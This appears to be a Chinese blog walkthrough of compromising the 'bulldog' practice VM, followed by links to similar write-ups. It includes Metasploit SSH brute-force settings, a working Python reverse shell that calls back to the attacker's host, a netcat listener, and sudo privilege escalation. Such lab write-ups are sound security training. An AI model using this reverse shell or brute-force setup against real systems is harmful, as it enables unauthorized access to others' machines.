靶机实战(bulldog)
bulldog
- 实验环境
- 实验过程
- 信息收集
- 1.主机发现
- 2.端口扫描
- 3.目录扫描
- 4.web站指纹
- 5.漏洞发现
- 漏洞利用
- 提权
- 总结
实验环境
靶机:bulldog
测试机:win10 ,kali
实验过程
信息收集
1.主机发现
靶机ip:192.168.238.146
2.端口扫描
先用masscan进行快速全面的扫描
nmap扫描得到端口服务信息
3.目录扫描
访问80,web服务进行目录扫描
4.web站指纹
以python环境搭建web
5.漏洞发现
1.尝试ssh弱口令:利用msf,hydra等
msf:
设置参数
set pass_file pwd.txt
set rport 23
set rhost 192.168.238.146
set verbose true
run
2.web漏洞
查看目录扫描结果发现:后台登录口: http://192.168.238.131/admin
尝试:sql注入,弱口令,万能密码等尝试登录
webshell界面:http://192.168…238.131/dev
需要身份验证
审查元素发现疑似数据库用户名密码
md5解密
尝试在admin页面,和ssh登录
成功登录admin,但提示不允许仍和编辑操作
回到需身份验证的web界面
发现命令执行漏洞
漏洞利用
结合命令执行写python反弹shell脚本
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.238.131",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
将脚本放在var/www/html下开启apache服务,下载至靶机
kali :nc -nvlp 8080 监听8080端口
拿到shell
提权
python 开启一个终端:
python -c 'import pty; pty.spawn("/bin/bash")'
常规三连 :whoami ,uname -a ,cat etc/issue
在/home/bulldogadmin/.hiddenadmindirectory 目录下 读取customPermissionApp文件
strings customPermissionApp
找到类似密码: SUPERultimatePASSWORDyouCANTget
sudo命令拿到权限
总结
主机发现,nmap -sn ,netdiscover等扫描工具;端口扫描,先masscan进行快速大量的扫描,在nmap 指定端口进行版本,服务等信息搜集,whatweb 进行网站指纹,cms扫描,对收集到的服务版本进行进一步手段,ssh爆破(msf,hydra),登陆口(弱口令,sql注入,万能密码),命令执行漏洞(反弹shell);得到shell后可用python弹一个终端进行操作;提权 :查找关键性文件(apache配置文件,etc/passwd等),查看当前用户是否在sudo组里(sudo su命令输入当前用户密码)
靶机实战(bulldog)相关推荐
- 红日安全ATT&CK靶机实战系列之vulnstack2
typora-root-url: pic\ATT&CK靶机实战系列--vulnstack2 声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http:// ...
- hdf5 目录没有serial_Serial靶机实战
原创Jarry 四叶草网络安全学院 今天研究一下php反序列化,靶机serial实战.目标为获取root权限. 靶机信息 可以去vulhub上下载此靶机,下载好,之后,使用Vmware新建虚拟机打开, ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- 靶机测试-bulldog
测试步骤 信息收集 主机发现 端口及其服务扫描 目录扫描 测试 对应端口服务测试 后台目录寻找漏洞 提权 总结 遇到的问题 信息收集 主机发现 kali IP地址查询,确认靶机存在网段 使用nmap进 ...
- DC-5 vulnhub靶机实战
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...
- Vulnhub靶机实战——DC-8
靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...
- Vulnhub-CTF6靶机实战
前言 靶机下载地址:下载地址 KALI地址:192.168.10.73 靶机地址:192.168.10.40 一.信息收集 1.主机发现 使用命令如下,来进行主机发现 netdiscover -r 1 ...
- Vulnhub靶机实战——DC-5
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...
- Vulnhub-potato靶机实战
文章目录 学习笔记下载 靶机下载 第一部分 信息收集 第一步 主机发现 第二步 端口扫描 第三步 访问网站 第四步 扫描目录 第四步 访问扫描出的目录 第五步 回到开放的端口,分析,发现7120开放 ...
最新文章
- Sublime Text 3 及Package Control 安装(附上一个3103可用的Key)
- Qt Data Visualization
- R语言ggplot2可视化绘制多条基本线图(Basic line plot)、使用gghighlight包突出高亮其中的某一条线图(highlight line plot)
- 使用eclipse搭建嵌入式开发环境
- c#生成一组不同的随机数的方法
- 机器学习笔记(二)——多变量最小二乘法
- 人工智障学习笔记——强化学习(4)时间差分方法
- java怎样自动调用鼠标点击屏幕固定地方_python办公自动化:让PyAutoGUI来帮你干活...
- Google Jump Consistent Hash 一致性哈希算法
- SQL Server中的版本号
- (摘要)100个伟大的商业理念:理念35:引爆流行
- Esp8266(4)
- springCloud Finchley 实战入门(基于springBoot 2.0.3)【五 Hystrix 服务容错保护】
- Python openpyxl文档
- Markdown学习笔记
- 宏基因组数据分析:差异分析(LEfSe安装使用及LDA score计算)
- cgcs2000大地坐标系地图_我国大地坐标系_地图与地图制图
- 庄子心得06:总有路可走
- MySQL——Using Filesort文件排序详解
- android netd和kernelframeworks的通信逻辑
热门文章
- redis基础知识:数据结构SDS
- QQ网络存储随便用(原创)
- 计算机英语输入法怎么,电脑为什么输入法总是英文怎么办
- edge浏览器 查看MD文件
- php word转化为html,php如何把word转换为html(这里使用COM)
- 如何利用泰勒级数展开式计算数学函数的值(SCL代码)
- 投资理财学习笔记二,1.4做个有钱人之富人思维
- 下载数据库名前加“#”方法
- win 10卸载mysql_Windows 10系统下彻底删除卸载MySQL的方法教程
- 建站购买服务器前必看:服务器各参数的超详细说明